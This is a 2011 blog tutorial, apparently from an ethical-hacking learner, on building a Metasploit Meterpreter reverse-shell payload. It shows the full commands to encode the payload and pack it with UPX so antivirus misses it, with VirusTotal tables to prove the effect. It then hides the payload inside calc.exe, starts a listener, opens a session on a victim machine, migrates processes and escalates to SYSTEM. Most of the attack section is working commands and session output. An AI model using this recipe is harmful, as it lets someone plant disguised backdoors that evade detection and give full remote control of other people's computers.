Archive for category Client-Side Exploitation

Payload Creation

I’m going to jump ahead a bit this month.  I’ve been attending the Offensive-Security Ohio Chapter meetings, hosted by Offensive-Security and Diebold, Incorporated, and lead by ReL1K.  If you have the means and you’re just getting into the business of ethical hacking, I highly recommend attending.  If you’re not in the area, the last meeting was streamed via USTREAM, so check the Offensive-Security site for details.

At the first two meetings, we learned the basics of Metasploit, Fast-Track, and SET.  I’m just going to cover the topic of creating a payload and encoding it to avoid detection from anti-virus.

First, we use “msfpayload” to dump the shell code that will produce a reverse bind Meterpreter session.  Meterpreter is the holy-grail of Metaploit.  It allows us to easily upload/download files and run commands, steal access tokens, disable AV, enable RDP and much, much more.  The reverse bind allows the session to traverse a NAT environment.  We just need to assign a port that we know will pass any egress filter, such as 80 or 443.  Here is the command that we use to create the raw data:

cd /pentest/exploits/framework3
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.147 lport=443 R > moo.raw

Next, we create an executable from the raw dump and encode it with five iterations of “Shikata ga nai” (Japanese for “it can’t be helped” or “nothing can be done about it”).  It is an encoding algorithm that we use to avoid detection from AV.

msfencode -i moo.raw -o moo.exe -e x86/shikata_ga_nai -c 5 -t exe

Let’s put this executable to the test.  VirusTotal is an excellent site that allows to upload a file, which it will scan using numerous anti-virus engines.

Antivirus Version Last update Result
AhnLab-V3 2011.03.20.00 2011.03.19 Trojan/Win32.Shell
AntiVir 7.11.5.1 2011.03.18 TR/Crypt.EPACK.Gen2
Antiy-AVL 2.0.3.7 2011.03.19
Avast 4.8.1351.0 2011.03.19 Win32:SwPatch
Avast5 5.0.677.0 2011.03.19 Win32:SwPatch
AVG 10.0.0.1190 2011.03.19 Win32/Heur
BitDefender 7.2 2011.03.19 Backdoor.Shell.AC
CAT-QuickHeal 11.00 2011.03.19 Win32.Trojan.Swrort.A.4
ClamAV 0.96.4.0 2011.03.19
Commtouch 5.2.11.5 2011.03.19 W32/Swrort.A.gen!Eldorado
Comodo 8042 2011.03.19
DrWeb 5.0.2.03300 2011.03.19
Emsisoft 5.1.0.2 2011.03.19
eSafe 7.0.17.0 2011.03.17
eTrust-Vet 36.1.8223 2011.03.18 Win32/Swrort.A!generic
F-Prot 4.6.2.117 2011.03.19 W32/Swrort.A.gen!Eldorado
F-Secure 9.0.16440.0 2011.03.19 Backdoor.Shell.AC
Fortinet 4.2.254.0 2011.03.19
GData 21 2011.03.19 Backdoor.Shell.AC
Ikarus T3.1.1.97.0 2011.03.19
Jiangmin 13.0.900 2011.03.18
K7AntiVirus 9.94.4155 2011.03.19 Riskware
Kaspersky 7.0.0.125 2011.03.19
McAfee 5.400.0.1158 2011.03.19
McAfee-GW-Edition 2010.1C 2011.03.19
Microsoft 1.6603 2011.03.19 Trojan:Win32/Swrort.A
NOD32 5968 2011.03.19 a variant of Win32/Rozena.AH
Norman 6.07.03 2011.03.19
nProtect 2011-02-10.01 2011.02.15 Backdoor.Shell.AC
Panda 10.0.3.5 2011.03.19 Suspicious file
PCTools 7.0.3.5 2011.03.19
Prevx 3.0 2011.03.20
Rising 23.49.04.05 2011.03.18
Sophos 4.63.0 2011.03.20 Mal/Swrort-C
SUPERAntiSpyware 4.40.0.1006 2011.03.19 Trojan.Backdoor-PoisonIvy
Symantec 20101.3.0.103 2011.03.19
TheHacker 6.7.0.1.152 2011.03.19
TrendMicro 9.200.0.1012 2011.03.19
TrendMicro-HouseCall 9.200.0.1012 2011.03.19
VBA32 3.12.14.3 2011.03.18
VIPRE 8758 2011.03.20 Trojan.Win32.Swrort.B (v)
ViRobot 2011.3.19.4366 2011.03.19
VirusBuster 13.6.258.0 2011.03.19 Trojan.Rosena.Gen.1

Not bad, but hopefully we can do better.  Another trick ReL1k taught us was to use a UPX packer, which will further help us avoid being detected.  Here is the command to create a “packed” executable:

/pentest/database/sqlmap/lib/contrib/upx/linux/upx -9 -o moo_packed.exe moo.exe
Antivirus Version Last update Result
AhnLab-V3 2011.03.20.00 2011.03.19
AntiVir 7.11.5.1 2011.03.18 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2011.03.19
Avast 4.8.1351.0 2011.03.19
Avast5 5.0.677.0 2011.03.19
AVG 10.0.0.1190 2011.03.20 Win32/Heur
BitDefender 7.2 2011.03.19 Gen:Variant.Kazy.7277
CAT-QuickHeal 11.00 2011.03.19
ClamAV 0.96.4.0 2011.03.19
Commtouch 5.2.11.5 2011.03.19
Comodo 8042 2011.03.19
DrWeb 5.0.2.03300 2011.03.19
Emsisoft 5.1.0.2 2011.03.20
eSafe 7.0.17.0 2011.03.17
eTrust-Vet 36.1.8223 2011.03.18
F-Prot 4.6.2.117 2011.03.19
F-Secure 9.0.16440.0 2011.03.19 Gen:Variant.Kazy.7277
Fortinet 4.2.254.0 2011.03.19
GData 21 2011.03.19 Gen:Variant.Kazy.7277
Ikarus T3.1.1.97.0 2011.03.19
Jiangmin 13.0.900 2011.03.18
K7AntiVirus 9.94.4155 2011.03.19
Kaspersky 7.0.0.125 2011.03.19
McAfee 5.400.0.1158 2011.03.19
McAfee-GW-Edition 2010.1C 2011.03.19
Microsoft 1.6603 2011.03.19
NOD32 5968 2011.03.19
Norman 6.07.03 2011.03.19
nProtect 2011-02-10.01 2011.02.15 Gen:Variant.Kazy.7277
Panda 10.0.3.5 2011.03.19 Suspicious file
PCTools 7.0.3.5 2011.03.19
Prevx 3.0 2011.03.20
Rising 23.49.04.05 2011.03.18
Sophos 4.63.0 2011.03.20
SUPERAntiSpyware 4.40.0.1006 2011.03.19
Symantec 20101.3.0.103 2011.03.20 Suspicious.MH690.A
TheHacker 6.7.0.1.152 2011.03.19
TrendMicro 9.200.0.1012 2011.03.19 PAK_Generic.001
TrendMicro-HouseCall 9.200.0.1012 2011.03.20 PAK_Generic.001
VBA32 3.12.14.3 2011.03.18
VIPRE 8758 2011.03.20
ViRobot 2011.3.19.4366 2011.03.19
VirusBuster 13.6.258.0 2011.03.19

It’s not perfect, but definitely better.  There’s always going to be a cat-and-mouse game between the hackers and the anti-virus vendors.

One more trick.  What if we want to attach the Meterpreter payload to a known good executable, such as “calc.exe”?  Here’s a quick one-liner.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.147 LPORT=443 R | msfencode -x ./calc.exe -k -e x86/shikata_ga_nai -c 5 -t exe -o payload_calc.exe

Then we just need to setup a listener using Metasploit’s “multi/handler”, copy “payload_calc.exe” to the victim machine and execute it.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.147
LHOST => 192.168.0.147
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.147:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.123
[*] Meterpreter session 1 opened (192.168.0.147:443 -> 192.168.0.123:1089) at Mon Mar 21 17:17:07 -0400 2011

msf exploit(handler) > sessions -i

Active sessions
===============

 Id  Type                   Information               Connection
 --  ----                   -----------               ----------
 1   meterpreter x86/win32  BUDLITE\spohnl @ BUDLITE  192.168.0.147:443 -> 192.168.0.123:1089

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Booya!  We have a Meterpreter session and the victim is none the wiser.  As a final step, we’ll want to migrate the Meterpreter session off of the calc executable so we can maintain our session after calc is closed.  Oh, and don’t forget to upgrade your access to SYSTEM!

meterpreter > ps

Process list
============

 PID   Name                 Arch  Session  User                 Path
 ---   ----                 ----  -------  ----                 ----
 0     [System Process]
 4     System               x86   0
 540   smss.exe             x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 612   csrss.exe            x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
 636   winlogon.exe         x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
 680   services.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
 692   lsass.exe            x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
 848   vmacthlp.exe         x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
 940   svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1044  svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 1120  svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1288  svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1436  explorer.exe         x86   0        BUDLITE\spohnl       C:\WINDOWS\Explorer.EXE
 1532  spoolsv.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
 1720  VMwareTray.exe       x86   0        BUDLITE\spohnl       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1736  VMwareUser.exe       x86   0        BUDLITE\spohnl       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1892  inetinfo.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1940  sqlservr.exe         x86   0        NT AUTHORITY\SYSTEM  c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
 224   snmp.exe             x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\snmp.exe
 244   sqlbrowser.exe       x86   0        NT AUTHORITY\SYSTEM  c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
 336   vmtoolsd.exe         x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 376   VMUpgradeHelper.exe  x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 2148  alg.exe              x86   0                             C:\WINDOWS\System32\alg.exe
 3364  wuauclt.exe          x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\wuauclt.exe
 3372  cmd.exe              x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\cmd.exe
 2508  svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 3700  payload_calc.exe     x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\payload_calc.exe

meterpreter > migrate 1436
[*] Migrating to 1436...
[*] Migration completed successfully.
meterpreter > getuid
Server username: BUDLITE\spohnl
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

That’s all there is to it.  Now you can have your way with this system!

No Comments